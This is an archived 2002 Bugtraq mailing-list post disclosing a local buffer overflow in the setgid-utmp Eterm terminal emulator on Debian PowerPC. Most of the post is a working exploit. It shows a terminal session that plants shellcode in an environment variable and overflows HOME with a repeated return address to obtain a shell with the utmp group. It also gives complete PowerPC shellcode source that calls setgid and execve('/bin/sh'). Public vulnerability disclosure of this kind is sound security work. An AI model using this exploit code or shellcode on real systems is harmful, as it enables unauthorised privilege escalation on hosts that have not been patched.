Eterm SGID utmp Buffer Overflow (Local)
From: Charles 'core' Stevenson (core@bokeoa.com)Date: 01/13/02
- Previous message: Jeff Nathan: "Re: RPC/TCP Record Marking for IDS Evasion"
- Next in thread: Simon 'corecode' Schubert: "Re: Eterm SGID utmp Buffer Overflow (Local)"
- Reply: Simon 'corecode' Schubert: "Re: Eterm SGID utmp Buffer Overflow (Local)"
- Reply: Michael Jennings: "Re: Eterm SGID utmp Buffer Overflow (Local)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sun, 13 Jan 2002 07:57:57 -0700 From: Charles 'core' Stevenson <core@bokeoa.com> To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
I found this last night looking for suids to overflow. Tested on Debian
PowerPC Unstable. Yields gid utmp from which higher priveleges could be
gained with a little effort. I haven't looked too close but I think the
overflow might be in imlib2.
[-(core@euclid:/home/core/tmp)> gcc execve.c -o execve
[-(core@euclid:/home/core/tmp)> export EGG=`./execve`
sizeof(shellcode)=73
[-(core@euclid:/home/core/tmp)> ./getenv EGG
Shellcode @ 0x7fffff95
[-(core@euclid:/home/core/tmp)> export HOME=`perl -e 'print
"\x7f\xff\xff\x96"x1032'`
[-(core@euclid:/home/core/tmp)> Eterm
sh-2.05a$ id
uid=1000(core) gid=1000(core) egid=43(utmp) groups=1000(core)
ii eterm 0.9.1-2 Enlightened Terminal Emulator
ii libimlib2 1.0.4-1 Powerful image loading and rendering
library
/* execve.c
*
* PowerPC Linux Shellcode
*
* by Charles Stevenson <core@bokeoa.com>
*
* original execve by my good friend
* Kevin Finisterre <dotslash@snosoft.com>
*/
#include <stdio.h>
char shellcode[] =
/* setgid(43) utmp */
"\x38\x60\x01\x37" /* 100004a0: li
r3,311 */
"\x38\x63\xfe\xf4" /* 100004a4: addi
r3,r3,-268 */
"\x3b\xc0\x01\x70" /* 100004a8: li
r30,368 */
"\x7f\xc0\x1e\x70" /* 100004ac: srawi
r0,r30,3 */
"\x44\xff\xff\x02" /* 100004b0:
sc */
/* execve("/bin/sh") */
"\x7c\xa5\x2a\x78" /* 100004b0: xor
r5,r5,r5 */
"\x40\x82\xff\xed" /* 100004b4: bnel+ 100004a0
<main> */
"\x7f\xe8\x02\xa6" /* 100004b8: mflr
r31 */
"\x3b\xff\x01\x30" /* 100004bc: addi
r31,r31,304 */
"\x38\x7f\xfe\xf4" /* 100004c0: addi
r3,r31,-268 */
"\x90\x61\xff\xf8" /* 100004c4: stw
r3,-8(r1) */
"\x90\xa1\xff\xfc" /* 100004c8: stw
r5,-4(r1) */
"\x38\x81\xff\xf8" /* 100004cc: addi
r4,r1,-8 */
"\x3b\xc0\x01\x60" /* 100004d0: li
r30,352 */
"\x7f\xc0\x2e\x70" /* 100004d4: srawi
r0,r30,5 */
"\x44\xff\xff\x02" /* 100004d8:
sc */
"\x2f\x62\x69\x6e" /* 100004dc: cmpdi
cr6,r2,26990 */
"\x2f\x73\x68\x00"; /* 100004e0: cmpdi
cr6,r19,26624 */
int main(int argc, char **argv) {
fprintf(stderr,"sizeof(shellcode)=%d\n",sizeof(shellcode));
//__asm__("b shellcode");
printf("%s",shellcode);
return 0;
}
Best Regards,
Charles 'core' Stevenson
- Previous message: Jeff Nathan: "Re: RPC/TCP Record Marking for IDS Evasion"
- Next in thread: Simon 'corecode' Schubert: "Re: Eterm SGID utmp Buffer Overflow (Local)"
- Reply: Simon 'corecode' Schubert: "Re: Eterm SGID utmp Buffer Overflow (Local)"
- Reply: Michael Jennings: "Re: Eterm SGID utmp Buffer Overflow (Local)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
